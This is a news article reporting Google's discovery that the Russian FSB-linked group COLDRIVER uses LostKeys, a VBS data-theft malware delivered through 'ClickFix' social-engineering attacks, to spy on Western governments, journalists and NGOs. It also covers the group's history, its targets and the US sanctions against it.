The realm of cyber espionage has a new participant in the form of a stealthy malware known as “LostKeys.” Google has reported that a Russian state-backed group called COLDRIVER has been utilizing LostKeys since the beginning of this year to spy on Western governments, journalists, think tanks, and non-governmental organizations.
COLDRIVER is not a newcomer in the cyber espionage scene. In December, the UK and its intelligence allies known as “Five Eyes” pointed fingers at them. This hacking group has direct ties to Russia’s Federal Security Service (FSB), which is a significant player in counterintelligence and internal security.
Google’s Threat Intelligence Group (GTIG) detected LostKeys in January. COLDRIVER has been using this malware in targeted “ClickFix” attacks, which involve tricking individuals into running malicious PowerShell scripts through social engineering tactics. These scripts facilitate the download and execution of more malicious PowerShell commands, ultimately leading to the installation of LostKeys. Google has classified LostKeys as a Visual Basic Script (VBS) data theft malware that acts as a “digital vacuum cleaner,” extracting specific files and directories while sending system information back to the attackers.
COLDRIVER’s usual modus operandi includes stealing login credentials to access emails and contacts. Additionally, they have been known to deploy another malware called SPICA for document and file theft. LostKeys appears to serve a similar purpose but is reserved for “highly selective cases,” indicating its specialized role in COLDRIVER’s espionage activities.
Interestingly, COLDRIVER is not the only state-sponsored group utilizing ClickFix attacks. Groups associated with North Korea (Kimsuky), Iran (MuddyWater), and other Russian actors (APT28 and UNK_RemoteRogue) have also employed similar tactics in recent spying campaigns.
COLDRIVER, also known as Star Blizzard and Callisto Group, has been perfecting their social engineering and open-source intelligence techniques since 2017. Their targets have included defense and government entities, NGOs, and politicians. Following Russia’s invasion of Ukraine, their attacks have escalated, expanding to defense-industrial sites and US Department of Energy facilities.
The US State Department has imposed sanctions on several COLDRIVER members, including an alleged FSB officer. A substantial $10 million reward is being offered by US authorities for any information leading to the apprehension of other group members, underscoring the seriousness with which the US views COLDRIVER.